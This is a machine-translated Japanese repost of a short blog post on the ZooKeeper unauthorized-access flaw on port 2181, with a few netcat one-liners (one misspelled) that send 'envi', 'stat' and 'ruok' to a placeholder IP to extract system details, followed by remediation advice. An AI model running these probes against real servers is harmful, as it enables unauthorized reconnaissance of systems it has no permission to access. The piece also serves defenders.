Zookeeper の不正アクセスの脆弱性エクスプロイト - コードワールド

Zookeeper の不正アクセスの脆弱性エクスプロイト

開発 2023-12-17 02:13:48 訪問数: null

Zookeeper の不正アクセスの脆弱性エクスプロイト

1. 脆弱性の導入

ZooKeeper は、オープンソースの分散型アプリケーション調整サービスです。これは、Google の Chubby のオープンソース実装であり、Hadoop および Hbase の重要なコンポーネントです。分散アプリケーションに一貫したサービスを提供するソフトウェアであり、構成保守、ドメイン名サービス、分散同期、グループサービスなどの機能が提供されます。
ZooKeeper はデフォルトでポート 2181 で開かれます。アクセス制御がなければ、攻撃者は envi コマンドを実行することで、システム名や Java 環境などのシステムに関する大量の機密情報を取得できます。

脆弱性マイニング中に遭遇したので記録しました。

2. 脆弱性の悪用

NC 接続を使用し、envi を実行して機密情報を取得します

ehco envi | nc xxx.xxx.xxx.xxx 2181

ここに画像の説明を挿入します

stat：列出关于性能和连接的客户端的统计信息。
echo stat |nc xxx.xxx.xxx.xxx 2181

ここに画像の説明を挿入します

ruok：测试服务器是否运行在非错误状态。
echo ruok |nc xxx.xxx.xxx.xxx 2181

reqs：列出未完成的请求
envi：打印有关服务环境的详细信息
dump：列出未完成的会话和临时节点

3. 修理方法

Zookeeper がパブリックネットワークに直接公開されることを禁止します
アクセス制御を追加し、状況に応じて対応する方法を選択します (ユーザー、ユーザー名とパスワード、指定された IP の認証)

おすすめ

転載: blog.csdn.net/huangyongkang666/article/details/128762287

Zookeeper の不正アクセスの脆弱性エクスプロイト

ZooKeeperの不正アクセスの脆弱性生殖試験

ZooKeeperの不正な脆弱性

Linuxシステムのセキュリティ強化-ZooKeeper不正アクセスの脆弱性ハンドリング

fastcgi 不正アクセスの脆弱性 (php-fpm fast-cgi 不正アクセスの脆弱性)

【脆弱性再発】Apache Supersetの不正アクセス脆弱性（CVE-2023-27524）

Web セキュリティ: Redis の不正アクセス脆弱性テスト。

【ZooKeeperの】安装のZooKeeper

memcachedの不正アクセスの脆弱性

簡単な修正脆弱性へのmemcacheの不正アクセス

不正アクセスの脆弱性生殖試験をRedisの

MongoDBの不正アクセスの脆弱性生殖試験

JumpServer の不正アクセスの脆弱性 CVE-2023-42442

ubuntu18.04.2 hadoop3.1.2 + zookeeper3.5.5完全分散型の高可用性クラスタのセットアップ

脆弱性の再発 - 友人の UFIDA NC システムのインターフェイスにおける不正アクセスの脆弱性 (脆弱性検出スクリプトが付属)

不正アクセスの脆弱性を飼育係

springboot の不正な脆弱性 (Springboot の不正アクセスと修復に脆弱性が再発)

TongdaOA任意のファイルの削除/ OAの不正アクセス+任意のファイルのアップロードRCEの脆弱性の再現

エクスプロイトの危険の脆弱性レポートのFastJSON

Redisの不正アクセスの脆弱性リプレイとリハビリテーションプログラム（未完）

【脆弱性の再発】JumpServer に不正アクセスの脆弱性（CVE-2023-42442）

脆弱性再発 - UFIDA NCの任意ファイルアップロードの脆弱性（脆弱性検出スクリプトあり）

ソフトウェアアーキテクチャ-zookeeperクラスターのデプロイとクイックスタート

Redis 4.x /5.xの不正アクセスの脆弱性

（Windows）zookeeperクラスターのデプロイ

[プリンシパルスキャン] Spring Boot アクチュエーターの不正アクセスの脆弱性

ThinkAdminV6の不正アクセスと任意のファイル表示の脆弱性の再発

OAフロントデスクでのユーザーログインの脆弱性へのアクセス

Zookeeperのインストールとクラスターの構築（1）Zookeeperスタンドアロンインストール

「エクスプロイトの危険なセキュリティ - ソフトウェア脆弱性分析技術」ラボノート

おすすめ

ライナスは「ドッグフードを食べる」ことに最も積極的！

Open Source Daily | Winamp プレーヤーがオープンソースになりつつある; 生成 AI の戦いは第 2 ラウンドにエスカレート; AI はバブルの初期段階に入った; Yongming を Alibaba Cloud に導入しますか?

ランキング

C言語プログラミングの最新の方法（第2回）第12章回答（自分で書いた回答、継続的に更新）

フレームワークの蜂のアップロードファイルに移動します

タイトルバーシリーズ：タイトルバーで遭遇したピットを非表示にする

Unityはゲームオブジェクトの様々な状況を取得します

N個の異なるボールは、Mどのように多くの種類のプログラムのと同じ袋に入れられますか？

オブジェクト指向のクラス、オブジェクト21

C ++オブジェクト指向プログラミングの研究ノート（8）

P3954 [NOIP2017 普及组] 成绩

分業のプロセス間通信 - ロック

ハッカーは通常、DOSコマンドウィンドウを使用します

アーカイブ

もっと

2024-05-20(5)

2024-05-19(0)

2024-05-18(30)

2024-05-17(6)

2024-05-16(24)

2024-05-15(5)

2024-05-14(9)

2024-05-13(8)

2024-05-12(27)

2024-05-11(31)